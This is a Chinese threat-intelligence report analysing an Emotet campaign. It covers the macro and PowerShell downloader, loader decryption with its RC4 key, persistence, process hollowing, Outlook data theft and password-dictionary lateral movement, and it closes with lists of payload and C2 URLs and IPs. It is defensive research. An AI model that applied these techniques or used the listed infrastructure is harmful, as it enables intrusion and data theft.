您好,登錄后才能下訂單哦!
Emotet是一種通過郵件傳播的銀行木馬,誘騙用戶點擊執(zhí)行惡意代碼,最早被發(fā)現(xiàn)于2014年并持續(xù)活動至今,在國內(nèi)也有一定的影響面,其積極的殺軟對抗策略使之成為一個難纏的對手。
2019年9月23日奇安信病毒響應(yīng)中心發(fā)布了Emotet威脅預(yù)警,經(jīng)長期追蹤,近期奇安信病毒響應(yīng)中心發(fā)現(xiàn)多個帶有惡意宏代碼的Emotet魚叉攻擊郵件,郵件通過誘導(dǎo)用戶點擊啟用宏從而執(zhí)行宏代碼,利用PowerShell下載并執(zhí)行下階段攻擊載荷。具體攻擊模塊功能包括OutLook數(shù)據(jù)竊取以及橫向滲透模塊。
樣本執(zhí)行流程如下:
誘餌文檔為英文編寫,顯示內(nèi)容為提示用戶啟用宏:
當(dāng)用戶啟用宏之后則會自動執(zhí)行AutoOpen,從而觸發(fā)宏代碼。AutoOpen中最終會解碼出一段Base64編碼的PowerShell代碼,隨后調(diào)用PowerShelll執(zhí)行該段Base64代碼。
Base64代碼以及解碼后數(shù)據(jù)如下:
將解碼的Base64數(shù)據(jù)整理之后發(fā)現(xiàn)該段代碼會從五個不同的服務(wù)器中嘗試下載下階段攻擊載荷,如果下載成功則執(zhí)行該攻擊載荷。
此次使用的攻擊載荷托管服務(wù)器有失陷主機,Emote也借此來躲避查殺。
該樣本參考編譯時間為2019年10月7號,從奇安信病毒響應(yīng)中心數(shù)據(jù)來看該PowerShell所訪問的五個URL在國內(nèi)的解析時間線幾乎都是從10月26號開始
該樣本基于MFC編寫,功能代碼在導(dǎo)出函數(shù)中實現(xiàn),在創(chuàng)建窗口之后通過消息處理函數(shù)來調(diào)用導(dǎo)出函數(shù)nZzNNxCMObNaV。
nZzNNxCMObNaV導(dǎo)出函數(shù)中調(diào)用的函數(shù)名稱都是動態(tài)獲取函數(shù)地址然后調(diào)用,函數(shù)名稱通過資源ID來獲取。
隨后使用RC 4解密ShellCode來執(zhí)行,密鑰為(vGdOmmadpKaisrM):
解密出的ShellCode中包含一個PE文件并在內(nèi)存中加載,該DLL參考編譯時間為10月18日:
在獲取命令行參數(shù)之后會與“--b57a4fbf”進(jìn)行比較,來判斷是否有指定的參數(shù)存在,如果不存在則給定參數(shù)重新啟動自身并退出當(dāng)前進(jìn)程:
帶參啟動之后獲取磁盤序列號:
格式化序列號作為Mutex的參數(shù):
創(chuàng)建Mutex名稱為"Global\I90D2908D":
以及Mutex: "Global\M90D2908D":
以及Mutex: "Global\E90D2908D":
將自身文件Map到內(nèi)存并計算CRC32的值:
獲取計算機名稱:
創(chuàng)建名稱為"sketchflow"的服務(wù),并啟動服務(wù)sketchflow.exe,該EXE為自身拷貝到system32目錄下,隨后該進(jìn)程調(diào)用ExitProcess退出。
如果在創(chuàng)建服務(wù)器之前調(diào)用OpenSCManager失敗則表示當(dāng)前無法通過服務(wù)來保持自啟動,則會通過Run注冊表來保持持久性攻擊的目的:
調(diào)用系統(tǒng)API獲取當(dāng)前系統(tǒng)信息:
通過PEB結(jié)構(gòu)體獲取當(dāng)前進(jìn)程SessionID:
枚舉進(jìn)程:
格式化出上線URL:
調(diào)用Http系列函數(shù)與服務(wù)器通信:
如果通信成功則調(diào)用InternetReadFile從服務(wù)器讀取數(shù)據(jù),如果通信失敗則通過通過WaitForSingleObject等待4571ms之后循環(huán)以上步驟。
調(diào)用CryptDecrypt解密:
申請空間,修復(fù)導(dǎo)入表之后內(nèi)存中創(chuàng)建線程加載從服務(wù)器下載的攻擊載荷:
從服務(wù)器下載到數(shù)據(jù)之后處理分為三種方式:
第一種直接將數(shù)據(jù)寫入文件,并調(diào)用CreateProcess執(zhí)行插件:
第二種是寫入文件之后還可以在不同的Session下創(chuàng)建進(jìn)程:
第三種是直接調(diào)用CreateThread來執(zhí)行ShellCode:
奇安信病毒響應(yīng)中心在對Emotet的持續(xù)關(guān)注中發(fā)現(xiàn)了另一個版本的EmotetLoader樣本,在EmotetLoader基本功能不變的情況下在對內(nèi)加密ShellCode的處理上有了新的變化。
一種方法是通過將加密的ShellCode保存在數(shù)組中,另一種是將加密的ShellCode放置在資源數(shù)據(jù)中,通過FindResourceA等系列API獲取資源并解密數(shù)據(jù)。
本次捕獲的樣本從服務(wù)器下載的PayLoad中實則還包含兩個攻擊模塊。一個模塊為竊取OutLook數(shù)據(jù),另一個模塊為橫向滲透。
通過創(chuàng)建線程的方法在內(nèi)存在執(zhí)行從服務(wù)器下載的PayLoad,該段代碼Dump之后發(fā)現(xiàn)也是一個DLL,參考編譯時間為2019年10月15日。
執(zhí)行DLLMain的代碼,首先會嘗試刪除Temp目錄下的文件,該文件由被注入到子進(jìn)程創(chuàng)建,文件中保存的是獲取的OutLook信息:
申請空間,在內(nèi)存中釋放準(zhǔn)備注入到到進(jìn)程的代碼:
創(chuàng)建一個掛起的進(jìn)程自身,參數(shù)為獲取的OutLook數(shù)據(jù)保存的文件路徑:
為子進(jìn)程申請空間,調(diào)用GetThreadContext獲取子進(jìn)程的上下文信息,原本子進(jìn)程的數(shù)據(jù)是映射在0x400000的位置:
將之前在內(nèi)存中釋放的DLL寫入到子進(jìn)程中,并調(diào)用SetThreadContext設(shè)置子進(jìn)程的EIP,從而執(zhí)行注入的代碼:
寫入子進(jìn)程的地址為0x40000,即子進(jìn)程程序初始化時模塊映射的地址,調(diào)用WriteProcessMemory寫入該地址,覆蓋原始數(shù)據(jù),該注入技術(shù)為典型的Process Hollowing。
子進(jìn)程啟動時由于被掛起,所以在線程恢復(fù)時執(zhí)行RtlUserThreadStart,EAX的值指向線程執(zhí)行的起始位置開始執(zhí)行注入的DLL的OEP
隨后等待進(jìn)程執(zhí)行完成退出,讀取Temp文件的數(shù)據(jù):
連接服務(wù)器發(fā)送數(shù)據(jù)并等待數(shù)據(jù)返回:
該模塊為通過SetThreadContext注入到子進(jìn)程中執(zhí)行的DLL,參考編譯時間為2019年3月31日。
該DLL啟動之后會查詢OutLook的注冊表DLLPathEx項的信息:
在Temp目錄下創(chuàng)建文件,該文件負(fù)責(zé)保存讀取的OutLook的信息:
該PayLoad會獲取OutLook數(shù)據(jù)內(nèi)容:
獲取之后格式化,并將其寫入到Tmp文件中,隨后進(jìn)程退出:
該模塊通過線程直接在內(nèi)存中執(zhí)行。
模塊啟動之后會獲取計算機名稱以及當(dāng)前進(jìn)程名稱,并在內(nèi)存中解密出賬號和密碼的字典。
解密出的密碼字典如下:
枚舉當(dāng)前網(wǎng)絡(luò)環(huán)境下的網(wǎng)絡(luò)資源
嘗試使用字典連接到目標(biāo)服務(wù)器,如果成功則拷貝自身文件到目標(biāo)機器,并通過服務(wù)器啟動進(jìn)程已達(dá)到橫向滲透的目的:
奇安信病毒響應(yīng)中心發(fā)現(xiàn)多個同源樣本,樣本中使用的Loader以及從服務(wù)器下載的PayLoad均有所差異,不排除Emotet背后的攻擊者在改進(jìn)樣本功能的同時也在規(guī)避殺軟對相似樣本的同源查殺。從樣本行為來看此次攻擊活動主要目的是獲取用戶計算機信息以,OutLook數(shù)據(jù)以及做橫向滲透,攻擊者可能在為后續(xù)深入攻擊做鋪墊。
奇安信病毒響應(yīng)中心提醒用戶不要輕易打開未知郵件,提高安全意識。預(yù)防此類惡意樣本攻擊。
目前奇安信集團(tuán)全線產(chǎn)品,包括天擎、天眼、SOC、態(tài)勢感知、威脅情報平臺,支持對涉及該報告相關(guān)的攻擊活動檢測。
hxxp://www.encitmgdk.com/wp-content/jz9j7hptcw-bgwvnoaacn-64826306/
hxxp://new.1communityre.com/wp-admin/NhwvCC/
hxxps://simplecuisine.000webhostapp.com/wp-admin/UOdPpFk/
hxxps://ejerciciosantonio.000webhostapp.com/wp-admin/yds9q9bnpj-gp81uc99l-661630/
hxxps://edu.tizino.com/wvcly/uvsMEaKW/
96.20.84.254
45.56.122.75
85.25.92.96
94.177.253.126
189.166.13.109
212.112.113.235
216.70.88.55
138.186.179.235
95.216.207.86
176.58.93.123
189.132.130.111
75.154.163.1
60.52.64.122
181.36.42.205
143.95.101.72
203.99.188.11
70.45.30.28
110.36.234.146
190.117.206.153
190.55.39.215
186.84.173.153
187.143.219.242
181.47.235.26
185.45.24.254
190.13.146.47
5.189.148.98
190.217.1.149
200.55.168.82
154.120.227.206
162.241.134.130
190.228.212.165
91.109.5.28
190.96.118.15
70.32.94.58
83.169.33.157
190.113.146.128
144.76.62.10
201.217.113.58
216.75.37.196
181.61.143.177
211.229.116.130
157.7.164.178
186.92.11.143
203.99.187.137
187.188.166.192
203.99.188.203
190.16.101.10
201.196.15.79
113.52.135.33
186.109.91.136
189.218.243.150
42.190.4.92
178.249.187.150
138.197.140.163
51.38.134.203
23.253.207.142
186.146.110.108
152.170.220.95
200.90.86.170
192.241.220.183
172.104.70.207
181.197.2.80
http://111.119.233.65/codec/site/
http://190.210.184.138/ban/
http://51.255.165.160/loadan/enabled/raster/merge/
http://45.56.79.249/arizona/
http://163.172.40.218/health/
http://91.205.215.57/stubs/symbols/raster/merge/
http://68.183.170.114/iab/arizona/raster/merge/
http://190.217.1.149/site/add/
http://62.75.160.178/child/sess/
http://200.113.106.18/publish/iab/raster/
http://5.196.35.138/devices/prov/raster/
http://89.188.124.145/prep/devices/raster/
http://89.188.124.145/vermont/srvc/
http://186.23.132.93/entries/ban/scripts/merge/
http://51.15.8.192/loadan/sym/
http://190.38.14.52/usbccid/cone/scripts/merge/
http://217.199.160.224/usbccid/
http://207.154.204.40/report/xian/scripts/
http://142.93.114.137/health/prep/
http://94.183.71.206/iplk/
http://190.104.253.234/pnp/balloon/scripts/
http://212.71.237.140/bml/teapot/scripts/
http://201.163.74.202/publish/scripts/scripts/merge/
http://201.190.133.235/bml/usbccid/
http://186.15.57.7/scripts/child/
http://86.42.166.147/acquire/
http://82.196.15.205/cookies/
http://186.68.141.218/taskbar/ringin/
http://46.28.111.142/scripts/
http://138.68.106.4/health/cookies/scripts/merge/
http://190.10.194.42/child/codec/scripts/merge/
http://104.131.58.132/guids/ban/scripts/merge/
http://104.131.58.132/guids/ban/scripts/merge/
http://190.230.60.129/badge/entries/
http://109.169.86.13/guids/
http://181.44.166.242/merge/tlb/scripts/
http://46.41.151.103/sess/xian/scripts/
http://144.139.158.155/devices/sess/scripts/
http://183.82.97.25/psec/chunk/scripts/merge/
http://149.62.173.247/raster/devices/scripts/
http://81.169.140.14/xian/splash/
http://190.230.60.129/enable/acquire/scripts/merge/
http://190.230.60.129/enable/acquire/scripts/merge/
http://77.245.101.134/child/between/scripts/merge/
http://46.29.183.211/acquire/
http://68.183.190.199/balloon/
http://220.241.38.226/guids/arizona/scripts/
http://45.79.95.107/attrib/xian/
http://200.58.83.179/balloon/srvc/
http://190.97.30.167/schema/vermont/scripts/
http://178.79.163.131/symbols/devices/scripts/merge/
http://77.55.211.77/badge/splash/scripts/merge/
http://201.213.32.59/site/acquire/scripts/merge/
http://79.143.182.254/teapot/
http://14.160.93.230/stubs/entries/scripts/
http://178.249.187.151/entries/report/scripts/
http://190.182.161.7/pdf/arizona/
http://181.59.253.20/ringin/jit/scripts/merge/
http://139.5.237.27/results/ringin/scripts/
http://154.120.227.206/ringin/iab/scripts/
http://91.83.93.124/chunk/vermont/
http://181.16.17.210/stubs/cookies/
http://80.85.87.122/jit/balloon/scripts/merge/
http://119.59.124.163/badge/tpt/
http://190.230.60.129/site/raster/scripts/
http://181.135.153.203/cab/enabled/scripts/
http://185.86.148.222/usbccid/entries/
http://46.101.212.195/devices/taskbar/scripts/merge/
http://200.113.106.18/usbccid/symbols/scripts/
http://50.28.51.143/splash/
http://86.6.188.121/report/chunk/
http://62.75.143.100/between/prov/scripts/merge/
http://81.213.215.216/guids/iplk/
http://181.36.42.205/acquire/
http://186.1.41.111/attrib/
http://203.25.159.3/sess/
http://79.127.57.43/jit/window/
http://69.163.33.84/vermont/bml/scripts/merge/
http://190.146.131.105/prep/
http://87.106.77.40/symbols/
http://91.204.163.19/walk/ringin/scripts/
http://94.177.183.28/codec/publish/
http://111.119.233.65/enabled/
http://190.210.184.138/enabled/iplk/scripts/merge/
http://51.255.165.160/forced/
http://45.56.79.249/badge/site/
http://163.172.40.218/arizona/walk/scripts/
http://68.183.170.114/badge/merge/scripts/
http://68.183.170.114/badge/merge/scripts/
http://62.75.160.178/usbccid/taskbar/
http://200.113.106.18/json/forced/scripts/
http://89.188.124.145/sym/img/scripts/
http://186.23.132.93/badge/prep/scripts/merge/
http://51.15.8.192/ringin/vermont/scripts/merge/
http://190.38.14.52/json/devices/scripts/merge/
http://217.199.160.224/cookies/splash/scripts/merge/
http://207.154.204.40/attrib/json/raster/
http://207.154.204.40/attrib/json/raster/
http://94.183.71.206/glitch/enabled/raster/
http://212.71.237.140/between/taskbar/raster/merge/
http://201.163.74.202/loadan/loadan/
http://201.190.133.235/odbc/img/
http://186.15.57.7/cab/srvc/raster/
http://86.42.166.147/scripts/attrib/
http://82.196.15.205/report/devices/
http://186.68.141.218/attrib/tpt/raster/
http://46.28.111.142/attrib/json/
http://138.68.106.4/forced/window/raster/
http://190.10.194.42/splash/
http://104.131.58.132/schema/cone/raster/
http://190.96.118.15/health/report/raster/
http://190.230.60.129/loadan/xian/
http://109.169.86.13/cone/
http://181.44.166.242/enabled/chunk/raster/
http://46.41.151.103/schema/iplk/
http://144.139.158.155/sym/badge/raster/
http://183.82.97.25/jit/
http://149.62.173.247/health/pnp/
http://81.169.140.14/loadan/enabled/raster/
http://190.230.60.129/symbols/
http://159.203.204.126/acquire/child/raster/
http://77.245.101.134/publish/symbols/raster/merge/
http://46.29.183.211/balloon/pdf/raster/merge/
http://68.183.190.199/json/chunk/raster/
http://220.241.38.226/jit/vermont/
http://45.79.95.107/chunk/devices/
http://190.97.30.167/srvc/health/raster/merge/
http://178.79.163.131/results/walk/raster/
http://190.120.104.21/acquire/raster/
http://77.55.211.77/iplk/enabled/
http://201.213.32.59/health/between/raster/merge/
http://79.143.182.254/report/cone/raster/merge/
http://14.160.93.230/schema/arizona/raster/
http://178.249.187.151/child/xian/
http://190.182.161.7/between/
http://181.59.253.20/srvc/prov/raster/merge/
http://139.5.237.27/scripts/cookies/raster/
http://154.120.227.206/codec/balloon/raster/
http://91.83.93.124/cookies/splash/
http://181.16.17.210/enable/json/raster/merge/
http://80.85.87.122/rtm/
http://119.59.124.163/ringin/usbccid/
http://190.230.60.129/iplk/
http://181.135.153.203/loadan/
http://185.86.148.222/loadan/tlb/raster/"
http://46.101.212.195/prov/
http://200.113.106.18/window/
http://201.184.41.228/stubs/enable/
http://50.28.51.143/window/
http://86.6.188.121/arizona/balloon/raster/merge/
http://62.75.143.100/prep/tpt/raster/
http://81.213.215.216/loadan/json/
http://181.36.42.205/entries/
http://186.1.41.111/enable/glitch/raster/merge/
http://203.25.159.3/cab/
http://79.127.57.43/loadan/forced/raster/
http://69.163.33.84/raster/pdf/raster/
http://41.75.135.93/tlb/nsip/
http://190.146.131.105/arizona/publish/raster/merge/
http://87.106.77.40/raster/vermont/raster/merge/
http://91.204.163.19/prep/iplk/raster/merge/
http://94.177.183.28/vermont/odbc/
http://51.254.218.210/iab/attrib/acquire/merge/
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。